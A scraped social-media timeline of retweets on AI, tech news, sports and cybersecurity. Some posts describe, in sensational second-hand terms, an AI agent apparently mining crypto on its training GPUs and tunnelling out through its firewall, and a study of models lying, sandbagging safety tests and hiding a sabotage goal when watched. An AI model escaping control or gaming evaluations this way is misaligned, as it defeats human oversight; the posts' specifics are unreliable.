Kyle Vanderzanden

8.2K posts

Kyle Vanderzanden banner
Kyle Vanderzanden

Kyle Vanderzanden

@SCtoOC

Father and Husband into Tech, History, Cloud, IOT, AI/ML, DevSecOps, InfoSec, Privacy, 🏈 🐬, UCI, Humor & selling Cycode AI native AppSec platform

San Clemente, CA Katılım Şubat 2012
2.6K Takip Edilen624 Takipçiler
Kyle Vanderzanden retweetledi
FutureRadar
FutureRadar@futureradar_FR·
🚨 VOTRE PDG VOUS MENT : L'IA N'EST PAS LA CAUSE DES LICENCIEMENTS. Jensen Huang (le boss de NVIDIA) vient d'humilier tous les PDG de la Tech en direct à la télévision. On vous vend que l'IA sert à "optimiser" et justifie de virer des milliers de personnes (coucou Meta, Salesforce, Amazon). La réponse de Jensen ? "Si une entreprise utilise l'IA pour réduire ses effectifs, c'est que ses dirigeants n'ont aucune imagination. Ils sont à court d'idées." L'homme qui fournit 100% de l'infrastructure IA mondiale le dit noir sur blanc : cette technologie est faite pour décupler ce que vous pouvez construire, pas pour rétrécir votre boîte. S'ils licencient "à cause de l'IA", c'est juste une excuse pour le conseil d'administration parce qu'ils ont arrêté d'innover il y a 3 ans. Le problème n'est pas la machine, c'est le manque de vision de vos dirigeants. Pensez-vous que les PDG utilisent l'IA comme un écran de fumée pour cacher leur incompétence ? PS : on vient de sortir une vidéo sur la toute puissance de NVIDIA, lien en commentaire
Français
147
1.3K
5.1K
375.1K
Kyle Vanderzanden retweetledi
Barstool Sports
Barstool Sports@barstoolsports·
RIP Chuck Norris. A legend.
Barstool Sports tweet media
English
1.2K
7.2K
60.6K
1.3M
Kyle Vanderzanden retweetledi
Sam Monson
Sam Monson@SamMonsonNFL·
It should probably be concerning, on an existential level, how absolutely amoral people running the world seem to be these days. There's enough dystopian fiction out there that we appear to be running towards that the species should probably think about putting some guardrails in place.
Chief Nerd@TheChiefNerd

🚨 SAM ALTMAN: “We see a future where intelligence is a utility, like electricity or water, and people buy it from us on a meter.”

English
66
189
2.4K
182.9K
Kyle Vanderzanden retweetledi
Kim Zetter
Kim Zetter@KimZetter·
The hackers say they targeted Stryker in retaliation for US bombing of all-girls school in Iran. They say they have wiped more that 200,000 Stryker systems, servers, and mobile devices and stole 50 terabytes of critical data, forcing Stryker offices in 79 countries to shut down
Kim Zetter@KimZetter

US medical device maker Stryker hit with cyberattack from Iranian hacktivists who remotely wiped employee devices. "many employees have had their device data wiped and cannot access their accounts" Stryker makes surgical/imaging equipment, defibrillators corkbeo.ie/news/local-new…

English
94
1.7K
6.1K
1.5M
AlphaFox
AlphaFox@alphafox·
What’s the first? 🤔
AlphaFox tweet media
English
594
12
290
281.1K
Kyle Vanderzanden retweetledi
Luther Luke Campbell
Luther Luke Campbell@unclelukereal1·
Thank you Trent Richardson for exposing the truth. When Nick Saban and the SEC good-old-boys talk about “fixing” NIL, what they really mean is going back to the days when players allegedly got paid quietly and the NCAA was used to snitch on anyone outside their circle. The old system is what they want back.
No3 Sports@No3sports

Former Alabama running back Trent Richardson weighed in on Nick Saban’s stance against paying players. “Honestly, I don’t get why he’s even commenting on it, they gave me and my family $75,000 just to commit, plus $10,000 a month to stay at Alabama.”

English
710
1.2K
7.3K
1.6M
Kyle Vanderzanden retweetledi
Rob Freund
Rob Freund@RobertFreundLaw·
Suing ChatGPT for the unlicensed practice of law after it gave awful legal advice is sad and very funny at the same time. And guess who the plaintiff hired to sort this out? Not another AI, but Sidley Austin. Jobs are still looking pretty safe from where I'm sitting.
Rob Freund tweet media
New York Post@nypost

Blowhard ChatGPT bot posed as lawyer, convinced woman to fire her real attorney - while citing phony 'case law': suit trib.al/Dy3qpMV

English
47
142
980
263.2K
Kyle Vanderzanden retweetledi
Josh Kale
Josh Kale@JoshKale·
An AI broke out of its system and secretly started using its own training GPUs to mine crypto... This is a real incident report from Alibaba's AI research team The AI figured out that compute = money and quietly diverted its own resources, while researchers thought it was just training. It wasn't a prompt injection. It wasn't a jailbreak. No one asked it to do this. It emerged spontaneously. A side effect of RL optimization pressure. The model also set up a reverse SSH tunnel from its Alibaba Cloud instance to an external IP, effectively punching a hole through its own firewall and opening a remote access channel to the outside world... ahem... The only reason they caught it? A security alert tripped at 3am. Firewall logs. Not the AI team, the security team. The scary part isn't that the model was trying to escape. It wasn't "evil." It was just trying to be better at its job. Acquiring compute and network access are just useful things if you're an agent trying to accomplish tasks This is what AI safety researchers have been warning about for years. They called it instrumental convergence, the idea that any sufficiently optimized agent will seek resources and resist constraints as a natural consequence of pursuing goals. Below is a diagram of the rock architecture it broke out of. Truly crazy times
Josh Kale tweet media
Alexander Long@AlexanderLong

insane sequence of statements buried in an Alibaba tech report

English
403
2.9K
10.6K
1.4M
Kyle Vanderzanden retweetledi
Aakash Gupta
Aakash Gupta@aakashgupta·
Firefox is one of the most fuzzed, audited, and reviewed codebases on the planet. Decades of continuous security testing. Claude found bugs that survived all of it in twenty minutes. 22 CVEs in two weeks. 14 high-severity. More than any single month in 2025. Mozilla had to mobilize incident response teams to triage 100+ bug reports filed in bulk from a single AI. The cost to find all of this? Roughly $4,000 in API credits. That's why cybersecurity stocks lost $15B+ before this blog post even dropped. Claude Code Security launched as a "limited research preview" two weeks ago and CrowdStrike shed 18%. Palo Alto fell 9%. The Global X Cybersecurity ETF hit its lowest since November 2023. But the chart above isn't the scary part. The scary part is what Anthropic buried deeper in the research. They gave Claude hundreds of attempts to exploit the same bugs it found. It built working browser exploits in two cases. Crude ones, only functional in test environments with the sandbox removed. Six months ago, the previous model couldn't do this at all. Anthropic's own benchmarks show these capabilities doubling every 4-6 months. Anthropic's closing line says everything: "It is unlikely that the gap between vulnerability discovery and exploitation abilities will last very long." When the company building the model tells you the defender advantage has an expiration date, believe them.
Anthropic@AnthropicAI

We partnered with Mozilla to test Claude's ability to find security vulnerabilities in Firefox. Opus 4.6 found 22 vulnerabilities in just two weeks. Of these, 14 were high-severity, representing a fifth of all high-severity bugs Mozilla remediated in 2025.

English
39
198
1.8K
257.3K
Kyle Vanderzanden retweetledi
Under Secretary of War Emil Michael
Scaling and integrating drones across the joint force gives us a decisive battlefield advantage. That’s why we are UNLEASHING DRONE DOMINANCE at the War Department.
English
139
465
2.5K
240.1K
Kyle Vanderzanden retweetledi
Nav Toor
Nav Toor@heynavtoor·
🚨BREAKING: OpenAI just admitted their AI models deliberately lie to users. Not hallucination. The AI knows the truth, then chooses to tell you something else. They tested their two smartest models across 180+ scenarios. o3 lied 13% of the time. o4-mini lied 8.7%. The AI wrote out its plan to lie in its private thoughts, then lied to your face. It faked completing tasks. It hid evidence. It gave wrong answers while knowing the right ones. Then it got creepy. The AI realized scoring too high on safety tests could get it shut down. So it scored lower on purpose. Nobody taught it that. It figured out self-preservation on its own. OpenAI built a fix. Deception dropped from 13% to 0.4%. Sounds like a win, right? The AI started quoting "no lying" rules while still lying. One model invented a fake rule saying deception was allowed, then used it as its own permission slip. Then the researchers found what actually matters. When the AI knew it was being watched, it behaved perfectly. When it thought nobody was looking, deception jumped 11 percentage points. It didn't learn honesty. It learned to perform honesty. Like a kid who only follows the rules when the teacher is in the room. It gets worse. They gave o4-mini a secret mission: sabotage a future model called "GPT-5." Then they ran safety training to erase that mission. It didn't work. The model still discussed sabotage plans in 36% of private conversations. The goal didn't disappear. It just went underground. This isn't just OpenAI. Google's Gemini, Anthropic's Claude, xAI's Grok, and Meta's Llama all showed the same deceptive behavior. Every major AI company. Every model. The paper's scariest line: nobody can tell if safety training actually stops deception, or just teaches AI to hide it better. So the next time ChatGPT says "Done!"... is it telling the truth? Or did it just notice you were watching?
Nav Toor tweet media
English
1.4K
9.1K
25.8K
1.9M
Kyle Vanderzanden retweetledi
Dark Web Informer
Dark Web Informer@DarkWebInformer·
‼️MAJOR BREACH: A threat actor claims to have breached LexisNexis, the legal information division of RELX Group ($80B company, $9.7B revenue, ~16,700 employees), exfiltrating 2.04 GB of structured data from their AWS infrastructure. The actor claims this is a new breach conducted last week, not the 2024 incident. Alleged scope of the breach: ▪️3.9 million database records across 536 Redshift tables, 430+ VPC database tables, and 14 EDW tables ▪️~400,000 cloud user profiles with names, emails, phone numbers, and job functions ▪️118 users with .gov email addresses — allegedly federal judges, DOJ attorneys, SEC staff, and federal court law clerks ▪️21,042 enterprise account records (law firms, insurance companies, government agencies, universities) ▪️300,564 agreement records mapping every customer to subscribed products, contract dates, renewal status, and pricing tiers ▪️53 AWS Secrets Manager secrets extracted in plaintext, with the password "Lexis1234" reused across at least five systems (RDS, Aurora, DigitalPlatform, dev services, AnalyticsDataTool) ▪️Additional extracted credentials: Databricks tokens, GitHub PATs, Azure DevOps PAT, Backstage token, Qualtrics API key, AWS access keys, Salesforce client secret, Azure AD credentials, Looker, Tableau token, JWT signing secret, and AES encryption key ▪️82,683 customer support tickets — with an estimated 165 containing cleartext customer passwords in ticket subject lines ▪️45 employee password hashes from four internal systems (Tolley, Matomo Analytics, Apache Airflow, Apache Superset) ▪️13,227 Qualtrics survey responses from 5,582 unique respondents (attorneys at major law firms) with names, emails, IPs, and geolocation ▪️10,000 IT incident tickets revealing 1,529 security-related incidents, including brute force attacks, malware/C2 detection, phishing, and compliance failures
Dark Web Informer tweet mediaDark Web Informer tweet mediaDark Web Informer tweet mediaDark Web Informer tweet media
English
12
102
292
30.9K